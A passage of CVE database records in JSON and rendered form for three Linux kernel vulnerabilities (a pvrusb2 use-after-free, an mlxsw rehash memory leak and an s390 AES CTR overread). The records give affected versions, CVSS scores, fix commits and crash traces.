"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ed8000e1e8e9",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "d29ed08964ce",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "ab896d93fd6a",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "eb6e9dce979c",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "3a1ec89708d2",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThanOrEqual": "8e60b99f6b7c",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "40cd818fae87",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "eaa410e05bdf",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"lessThan": "0a0b79ea55de",
"status": "affected",
"version": "e5be15c63804",
"versionType": "custom"
},
{
"status": "affected",
"version": "2.6.26"
},
{
"lessThan": "2.6.26",
"status": "unaffected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.311",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.273",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.214",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.153",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.183",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.23",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.11",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.2",
"versionType": "custom"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26875",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-08T18:16:38.134267Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-11T21:47:07.560Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/pvrusb2/pvrusb2-context.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ed8000e1e8e9684ab6c30cf2b526c0cea039929c",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "d29ed08964cec8b9729bc55c7bb23f679d7a18fb",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "ab896d93fd6a2cd1afeb034c3cc9226cb499209f",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "eb6e9dce979c08210ff7249e5e0eceb8991bfcd7",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "3a1ec89708d2e57e2712f46241282961b1a7a475",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "8e60b99f6b7ccb3badeb512f5eb613ad45904592",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "40cd818fae875c424a8335009db33c7b5a07de3a",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "eaa410e05bdf562c90b23cdf2d9327f9c4625e16",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "0a0b79ea55de8514e1750884e5fec77f9fdd01ee",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/pvrusb2/pvrusb2-context.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.26"
},
{
"lessThan": "2.6.26",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: pvrusb2: fix uaf in pvr2_context_set_notify\n\n[Syzbot reported]\nBUG: KASAN: slab-use-after-free in pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35\nRead of size 4 at addr ffff888113aeb0d8 by task kworker/1:1/26\n\nCPU: 1 PID: 26 Comm: kworker/1:1 Not tainted 6.8.0-rc1-syzkaller-00046-gf1a27f081c1f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nWorkqueue: usb_hub_wq hub_event\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0xc4/0x620 mm/kasan/report.c:488\n kasan_report+0xda/0x110 mm/kasan/report.c:601\n pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35\n pvr2_context_notify drivers/media/usb/pvrusb2/pvrusb2-context.c:95 [inline]\n pvr2_context_disconnect+0x94/0xb0 drivers/media/usb/pvrusb2/pvrusb2-context.c:272\n\nFreed by task 906:\nkasan_save_stack+0x33/0x50 mm/kasan/common.c:47\nkasan_save_track+0x14/0x30 mm/kasan/common.c:68\nkasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640\npoison_slab_object mm/kasan/common.c:241 [inline]\n__kasan_slab_free+0x106/0x1b0 mm/kasan/common.c:257\nkasan_slab_free include/linux/kasan.h:184 [inline]\nslab_free_hook mm/slub.c:2121 [inline]\nslab_free mm/slub.c:4299 [inline]\nkfree+0x105/0x340 mm/slub.c:4409\npvr2_context_check drivers/media/usb/pvrusb2/pvrusb2-context.c:137 [inline]\npvr2_context_thread_func+0x69d/0x960 drivers/media/usb/pvrusb2/pvrusb2-context.c:158\n\n[Analyze]\nTask A set disconnect_flag = !0, which resulted in Task B\u0027s condition being met\nand releasing mp, leading to this issue.\n\n[Fix]\nPlace the disconnect_flag assignment operation after all code in pvr2_context_disconnect()\nto avoid this issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:37.032Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ed8000e1e8e9684ab6c30cf2b526c0cea039929c"
},
{
"url": "https://git.kernel.org/stable/c/d29ed08964cec8b9729bc55c7bb23f679d7a18fb"
},
{
"url": "https://git.kernel.org/stable/c/ab896d93fd6a2cd1afeb034c3cc9226cb499209f"
},
{
"url": "https://git.kernel.org/stable/c/eb6e9dce979c08210ff7249e5e0eceb8991bfcd7"
},
{
"url": "https://git.kernel.org/stable/c/3a1ec89708d2e57e2712f46241282961b1a7a475"
},
{
"url": "https://git.kernel.org/stable/c/8e60b99f6b7ccb3badeb512f5eb613ad45904592"
},
{
"url": "https://git.kernel.org/stable/c/40cd818fae875c424a8335009db33c7b5a07de3a"
},
{
"url": "https://git.kernel.org/stable/c/eaa410e05bdf562c90b23cdf2d9327f9c4625e16"
},
{
"url": "https://git.kernel.org/stable/c/0a0b79ea55de8514e1750884e5fec77f9fdd01ee"
}
],
"title": "media: pvrusb2: fix uaf in pvr2_context_set_notify",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26875",
"datePublished": "2024-04-17T10:27:33.914Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:37.032Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35853 (GCVE-0-2024-35853)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix memory leak during rehash
The rehash delayed work migrates filters from one region to another.
This is done by iterating over all chunks (all the filters with the same
priority) in the region and in each chunk iterating over all the
filters.
If the migration fails, the code tries to migrate the filters back to
the old region. However, the rollback itself can also fail in which case
another migration will be erroneously performed. Besides the fact that
this ping pong is not a very good idea, it also creates a problem.
Each virtual chunk references two chunks: The currently used one
('vchunk->chunk') and a backup ('vchunk->chunk2'). During migration the
first holds the chunk we want to migrate filters to and the second holds
the chunk we are migrating filters from.
The code currently assumes - but does not verify - that the backup chunk
does not exist (NULL) if the currently used chunk does not reference the
target region. This assumption breaks when we are trying to rollback a
rollback, resulting in the backup chunk being overwritten and leaked
[1].
Fix by not rolling back a failed rollback and add a warning to avoid
future cases.
[1]
WARNING: CPU: 5 PID: 1063 at lib/parman.c:291 parman_destroy+0x17/0x20
Modules linked in:
CPU: 5 PID: 1063 Comm: kworker/5:11 Tainted: G W 6.9.0-rc2-custom-00784-gc6a05c468a0b #14
Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019
Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work
RIP: 0010:parman_destroy+0x17/0x20
[...]
Call Trace:
<TASK>
mlxsw_sp_acl_atcam_region_fini+0x19/0x60
mlxsw_sp_acl_tcam_region_destroy+0x49/0xf0
mlxsw_sp_acl_tcam_vregion_rehash_work+0x1f1/0x470
process_one_work+0x151/0x370
worker_thread+0x2cb/0x3e0
kthread+0xd0/0x100
ret_from_fork+0x34/0x50
ret_from_fork_asm+0x1a/0x30
</TASK>
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 843500518509128a935edab96bd8efef7c54669e Version: 843500518509128a935edab96bd8efef7c54669e Version: 843500518509128a935edab96bd8efef7c54669e Version: 843500518509128a935edab96bd8efef7c54669e Version: 843500518509128a935edab96bd8efef7c54669e Version: 843500518509128a935edab96bd8efef7c54669e Version: 843500518509128a935edab96bd8efef7c54669e |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "c6f3fa7f5a74",
"status": "affected",
"version": "843500518509",
"versionType": "git"
},
{
"lessThan": "617e98ba4c50",
"status": "affected",
"version": "843500518509",
"versionType": "git"
},
{
"lessThan": "413a01886c39",
"status": "affected",
"version": "843500518509",
"versionType": "git"
},
{
"lessThan": "b822644fd909",
"status": "affected",
"version": "843500518509",
"versionType": "git"
},
{
"lessThan": "0ae8ff7b6d42",
"status": "affected",
"version": "843500518509",
"versionType": "git"
},
{
"lessThan": "b3fd51f684a0",
"status": "affected",
"version": "843500518509",
"versionType": "git"
},
{
"lessThan": "8ca3f7a7b613",
"status": "affected",
"version": "843500518509",
"versionType": "git"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35853",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:34:35.252109Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-01T13:51:48.800Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.394Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c6f3fa7f5a748bf6e5c4eb742686d6952f854e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/617e98ba4c50f4547c9eb0946b1cfc26937d70d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/413a01886c3958d4b8aac23a3bff3d430b92093e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b822644fd90992ee362c5e0c8d2556efc8856c76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3fd51f684a0711504f82de510da109ae639722d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ca3f7a7b61393804c46f170743c3b839df13977"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c6f3fa7f5a748bf6e5c4eb742686d6952f854e76",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
},
{
"lessThan": "617e98ba4c50f4547c9eb0946b1cfc26937d70d1",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
},
{
"lessThan": "413a01886c3958d4b8aac23a3bff3d430b92093e",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
},
{
"lessThan": "b822644fd90992ee362c5e0c8d2556efc8856c76",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
},
{
"lessThan": "0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
},
{
"lessThan": "b3fd51f684a0711504f82de510da109ae639722d",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
},
{
"lessThan": "8ca3f7a7b61393804c46f170743c3b839df13977",
"status": "affected",
"version": "843500518509128a935edab96bd8efef7c54669e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix memory leak during rehash\n\nThe rehash delayed work migrates filters from one region to another.\nThis is done by iterating over all chunks (all the filters with the same\npriority) in the region and in each chunk iterating over all the\nfilters.\n\nIf the migration fails, the code tries to migrate the filters back to\nthe old region. However, the rollback itself can also fail in which case\nanother migration will be erroneously performed. Besides the fact that\nthis ping pong is not a very good idea, it also creates a problem.\n\nEach virtual chunk references two chunks: The currently used one\n(\u0027vchunk-\u003echunk\u0027) and a backup (\u0027vchunk-\u003echunk2\u0027). During migration the\nfirst holds the chunk we want to migrate filters to and the second holds\nthe chunk we are migrating filters from.\n\nThe code currently assumes - but does not verify - that the backup chunk\ndoes not exist (NULL) if the currently used chunk does not reference the\ntarget region. This assumption breaks when we are trying to rollback a\nrollback, resulting in the backup chunk being overwritten and leaked\n[1].\n\nFix by not rolling back a failed rollback and add a warning to avoid\nfuture cases.\n\n[1]\nWARNING: CPU: 5 PID: 1063 at lib/parman.c:291 parman_destroy+0x17/0x20\nModules linked in:\nCPU: 5 PID: 1063 Comm: kworker/5:11 Tainted: G W 6.9.0-rc2-custom-00784-gc6a05c468a0b #14\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:parman_destroy+0x17/0x20\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_atcam_region_fini+0x19/0x60\n mlxsw_sp_acl_tcam_region_destroy+0x49/0xf0\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x1f1/0x470\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:52.551Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c6f3fa7f5a748bf6e5c4eb742686d6952f854e76"
},
{
"url": "https://git.kernel.org/stable/c/617e98ba4c50f4547c9eb0946b1cfc26937d70d1"
},
{
"url": "https://git.kernel.org/stable/c/413a01886c3958d4b8aac23a3bff3d430b92093e"
},
{
"url": "https://git.kernel.org/stable/c/b822644fd90992ee362c5e0c8d2556efc8856c76"
},
{
"url": "https://git.kernel.org/stable/c/0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf"
},
{
"url": "https://git.kernel.org/stable/c/b3fd51f684a0711504f82de510da109ae639722d"
},
{
"url": "https://git.kernel.org/stable/c/8ca3f7a7b61393804c46f170743c3b839df13977"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix memory leak during rehash",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35853",
"datePublished": "2024-05-17T14:47:30.109Z",
"dateReserved": "2024-05-17T13:50:33.106Z",
"dateUpdated": "2025-05-04T09:06:52.551Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52669 (GCVE-0-2023-52669)
Vulnerability from cvelistv5
Published
2024-05-17 14:01
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: s390/aes - Fix buffer overread in CTR mode
When processing the last block, the s390 ctr code will always read
a whole block, even if there isn't a whole block of data left. Fix
this by using the actual length left and copy it into a buffer first
for processing.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0200f3ecc19660bebeabbcbaf212957fcf1dbf8f Version: 0200f3ecc19660bebeabbcbaf212957fcf1dbf8f Version: 0200f3ecc19660bebeabbcbaf212957fcf1dbf8f Version: 0200f3ecc19660bebeabbcbaf212957fcf1dbf8f Version: 0200f3ecc19660bebeabbcbaf212957fcf1dbf8f Version: 0200f3ecc19660bebeabbcbaf212957fcf1dbf8f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52669",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T14:16:01.568740Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:13.633Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:34.492Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd51e26a3b89706beec64f2d8296cfb1c34e0c79"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7f580cdb42ec3d53bbb7c4e4335a98423703285"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbc9a791a70ea47be9f2acf251700fe254a2ab23"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d68ac38895e84446848b7647ab9458d54cacba3e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e78f1a43e72daf77705ad5b9946de66fc708b874"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d07f951903fa9922c375b8ab1ce81b18a0034e3b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/s390/crypto/aes_s390.c",
"arch/s390/crypto/paes_s390.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cd51e26a3b89706beec64f2d8296cfb1c34e0c79",
"status": "affected",
"version": "0200f3ecc19660bebeabbcbaf212957fcf1dbf8f",
"versionType": "git"
},
{
"lessThan": "a7f580cdb42ec3d53bbb7c4e4335a98423703285",
"status": "affected",
"version": "0200f3ecc19660bebeabbcbaf212957fcf1dbf8f",
"versionType": "git"
},
{
"lessThan": "dbc9a791a70ea47be9f2acf251700fe254a2ab23",
"status": "affected",
"version": "0200f3ecc19660bebeabbcbaf212957fcf1dbf8f",
"versionType": "git"
},
{
"lessThan": "d68ac38895e84446848b7647ab9458d54cacba3e",
"status": "affected",
"version": "0200f3ecc19660bebeabbcbaf212957fcf1dbf8f",
"versionType": "git"
},
{
"lessThan": "e78f1a43e72daf77705ad5b9946de66fc708b874",
"status": "affected",
"version": "0200f3ecc19660bebeabbcbaf212957fcf1dbf8f",
"versionType": "git"
},
{
"lessThan": "d07f951903fa9922c375b8ab1ce81b18a0034e3b",
"status": "affected",
"version": "0200f3ecc19660bebeabbcbaf212957fcf1dbf8f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/s390/crypto/aes_s390.c",
"arch/s390/crypto/paes_s390.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.0"
},
{
"lessThan": "3.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
